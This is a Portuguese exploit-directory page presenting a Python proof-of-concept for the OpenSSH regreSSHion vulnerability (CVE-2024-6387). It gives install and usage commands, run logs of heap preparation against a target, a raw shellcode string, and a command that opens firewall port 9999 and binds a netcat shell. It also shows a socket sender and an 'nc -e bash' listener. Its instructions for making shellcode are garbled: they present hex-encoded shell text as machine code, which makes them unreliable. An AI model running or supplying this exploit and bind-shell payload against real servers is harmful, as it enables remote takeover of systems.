Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6387 — Script Python de prova de conceito para o exploit regreSSHion. | Kitploit
Ferramentas/GitHubGitHub/l-urk/cve-2024-6387
Análise de VulnerabilidadesExploraçãoShellcodeSegurança de RedeTestes de PenetraçãoFerramenta de Acesso RemotoGeração de ShellcodeDesenvolvimento de PayloadsExploração de Binários
GitHubl-urk/cve-2024-6387

CVE-2024-6387

Script Python de prova de conceito para o exploit regreSSHion.

1259há 1 anoAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-6387 regreSSHion

Script Python de prova de conceito para exploit regreSSHion. Versão 0.2.1 compilação POC regreSSHion-green-banner

Instalação

root@kitploit:~
git clone https://github.com/l-urk/CVE-2024-6387.git
root@kitploit:~
cd CVE-2024-6387
root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
python3 regreSSHion.py -h

Uso

root@kitploit:~
🔒 CVE-2024-6387 regreSSHion Script de exploit da vulnerabilidade de execução remota de código

uso: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]

🔒 CVE-2024-6387 regreSSHion Script de exploit da vulnerabilidade de execução remota de código

opções:
  -h, --help            mostra esta mensagem de ajuda e sai
  -i IP, --ip IP        endereço IPv4 do servidor SSH alvo (formato: -i 0.0.0.0)
  -p PORT, --port PORT  número da porta do servidor SSH alvo (formato: -p 22)
  -t, --time            HABILITAR exibição de HORA em toda saída de log (formato: -t)
  -c, --clear           LIMPAR TELA antes de executar o exploit (formato: -c)
  -d, --debug           habilitar a visualização dos LOGS DE DEPURAÇÃO durante a execução (formato: -d)
  -r, --repeat          habilitar para REPETIR EXPLOIT até que RCE tenha sucesso (formato: -r)
  -x, --skipssh         habilitar para PULAR HANDSHAKES SSH (formato: -x)
  -y, --skipheap        habilitar para PULAR HEAP e análise (formato: -y)
  -z, --skipfinal       habilitar para PULAR verificação FINAL DE ID (formato: -z)

🔒 Versões do OpenSSH afetadas: 1.2.2p1 ~ 4.4 e 8.5p1 ~ 9.8

🔒 contato: github.com/l-urk - x.com/l_urkk
Baixar ferramenta

Para usar o script, execute python3 com regreSSHion.py

  • Defina o ip para o endereço IPv4 do servidor SSH vulnerável
  • Defina a porta para o número da porta do servidor SSH vulnerável
root@kitploit:~
python3 regreSSHion.py --ip 127.0.0.1 --port 22
root@kitploit:~
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4

Digamos que você chegou até aqui no script...

root@kitploit:~
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.

Se aparecer "exploit verification success", você entregou e executou seu payload com sucesso. O script tentará algumas vezes até ter sucesso. Sugiro testar isso em seu próprio servidor SSH vulnerável até se familiarizar com a obtenção da mensagem de sucesso.

root@kitploit:~
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.

Modo de depuração

  • Com o modo de depuração ativado, você obterá uma saída mais detalhada, que mostrará a string de versão SSH recebida, informações de comprimento de pacote e algumas outras coisas, praticamente tudo que está acontecendo que possa ser registrado.
root@kitploit:~
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug

Exemplo de saída:

root@kitploit:~
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...

payload de shellcode

O shellcode padrão usa ufw para abrir a porta de entrada 9999 e inicia um shell ouvindo nc na porta 9999

root@kitploit:~
    shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

criação do payload de shellcode

Você pode criar seu próprio payload de shellcode usando um editor de ascii para hex e convertendo manualmente para shellcode. Eu uso este site ascii-to-hex: https://www.rapidtables.com/convert/number/ascii-to-hex.html

  • Insira o texto desejado para o shellcode.
  • Use as configurações "User defined" e "\x" na caixa de entrada.
  • Substitua todos os X maiúsculos por x minúsculos.
  • Use o Bloco de Notas ou outro programa capaz de substituir caracteres.
  • Mova o último \x do final para o início da string hexadecimal.
  • Adicione aspas em ambas as extremidades para interpretação pelo shell.

exemplos de payload de shellcode

olá mundo

root@kitploit:~
hello world
root@kitploit:~
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

printf hello world

root@kitploit:~
printf hello world
root@kitploit:~
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

criar arquivo de teste

root@kitploit:~
test > test
root@kitploit:~
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"

Permitir conexões de entrada na porta 9999 e abrir um shell nc na porta 9999

root@kitploit:~
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
root@kitploit:~
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"

send_socket.py

Se quiser testar a execução de um payload de shellcode, você pode usar o script send_socket.py. Uso:

root@kitploit:~
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)

Enviador:

root@kitploit:~
python3 send_socket.py -i 127.0.0.1 -p 1111

Ouvinte:

  • interpretação de texto bruto
root@kitploit:~
nc -lvp 1111
  • execução de shell
root@kitploit:~
nc -lvp 1111 -e /usr/bin/bash